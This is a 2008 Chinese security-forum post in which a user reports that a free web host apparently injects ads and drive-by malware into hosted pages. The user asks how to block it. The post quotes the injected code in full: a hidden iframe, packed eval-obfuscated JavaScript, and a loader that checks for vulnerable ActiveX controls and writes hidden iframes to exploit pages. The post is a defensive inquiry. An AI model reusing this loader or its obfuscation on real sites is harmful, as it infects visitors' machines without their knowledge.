标题:
[讨论]免费空间代码屏蔽问题
[打印本页]
作者:
虚竹
时间:
2008-7-23 08:27
标题:
[讨论]免费空间代码屏蔽问题
[讨论]免费空间代码屏蔽问题
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
议题作者:i_lv_lcx
最近发现,很多免费空间都会在你上传的网页中自动插入广告代码,甚至直接在你的网页理挂马
我最近用的
www.5944.net
就貌似在用我的网页挂马挂流量
如图1
未命名1.jpg
(61.67 KB)
图1
2008-2-23 10:38
打开
http://086170.service-google.cn/vip/Cn81599.htm
代码如下
引用:
<iframe src=wm2/index.html width=1 height=1 border=1></iframe>
<script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b("\\1\\0\\a\\1\\2\\9\\0\\2\\8\\4\\1\\5\\3\\0\\c\\7\\i\\h\\4\\d\\3\\2\\5\\f\\6\\e\\6\\0\\7\\g");',19,19,'x65|x74|x61|x6C|x73|x79|x6E|x27|x20|x72|x78|eval|x3D|x70|x6F|x3A|x3E|x69|x64'.split('|'),0,{}))</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1554929.js"></script>
再打开代码你引用的
http://086170.service-google.cn/vip/wm2/index.html
代码如下:
引用:
<script>
window.onerror=function(){return true;}
window.status="完成";
</script>
<script>
try{if(new ActiveXObject("Mi"+"cro"+"soft.X"+"ML"+"H"+"TT"+"P"))window["document"]["write"]('<iframe style=display:none src="2.gif"></iframe>');}catch(e){};
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b{a(c d("9"+"\\g\\7\\3\\2\\4\\5\\6"+"f"+"h.1"))o["p"]["q"](\'<0 n=m:i j="8.k"></0>\')}l(e){}',27,27,'iframe||x2E|x6C|x49|x45|x52|x74||IERP|if|try|new|ActiveXObject||PC|x43|tl|none|src|gif|catch|display|style|window|document|write'.split('|'),0,{}));
try{if(new ActiveXObject("M"+"PS.S"+"to"+"rm"+"Pl"+"ay"+"er"))window["document"]["write"]('<iframe style=display:none src="1.gif"></iframe>');}catch(e){};
try{if(new ActiveXObject("P"+"OW"+"ERPLA"+"YE"+"R.Powe"+"rPlay"+"erC"+"trl.1"))window["document"]["write"]('<iframe style=display:none src="5.gif"></iframe>');}catch(e){};
try{if(new ActiveXObject("GLCH"+"AT.GLCh"+"atCtrl.1"))window["document"]["write"]('<iframe style=display:none src="11.gif"></iframe>');}catch(e){};
try{if(new ActiveXObject("Ba"+"id"+"uB"+"ar.To"+"ol"))window["document"]["write"]('<iframe style=display:none src="4.gif"></iframe>');}catch(e){};
</script>
我真是不敢再往下看了..
不知邪八的各位大大有没有什么方法能屏蔽掉类似的代码
帖子9 精华
0
积分36 阅读权限40 在线时间7 小时
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2